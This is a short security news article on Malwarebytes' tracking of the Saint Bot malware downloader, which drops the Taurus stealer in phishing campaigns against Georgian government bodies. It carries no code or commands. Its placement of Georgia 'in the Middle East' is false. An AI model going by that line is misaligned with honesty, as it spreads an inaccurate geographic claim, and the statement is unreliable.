Researchers spotted a new malware downloader Saint Bot that drops stealers on compromised systems but can deliver any malware.
Over the recent weeks that, researchers at Malwarebytes have been tracking the Saint Bot dropper in targeted campaigns against government institutions in Georgia, the country in the Middle East. Researchers suspect several different threat actors are using the new malware downloader.
Attackers used Saint Bot to deliver information stealers and other malware, according to the security firm. One of the information stealers that Saint Bot dropped was Taurus that steals passwords, browser history, data in auto-fill forms, and cookies. Taurus can also steal certain FTP and email client credentials and things like system configuration details and installed software.
Malwarebytes researchers note that Saint Bot is designed to deliver any malware on a compromised system. The malware is usually distributed via spam and phishing emails, malicious websites, and infected apps. Most downloaders can evade detection, disable security tools on an infected machine, execute malicious commands, and connect to C2 servers.
Malwarebytes researchers spotted Saint Bot while investigating a phishing email with an unknown malware. The attached zip file was hiding a PowerShell script that looked like a link to a Bitcoin wallet. After a chain of code executions, the script eventually dropped Saint Bot on the compromised computer.
Saint Bot is equipped with several obfuscations and anti-analysis features, can detect virtual machines. It can also detect where systems are located and not execute in this case. Taurus, for example, is designed not to execute in CIS nations. Security researchers say this is a sign that the malware authors are from that region.
The security vendor says there are signs that the malware authors are still actively developing it.
“We are seeing new campaigns that appear to be from different customers, which would indicate that the malware author is involved in further customizing the product,” Malwarebytes researchers said.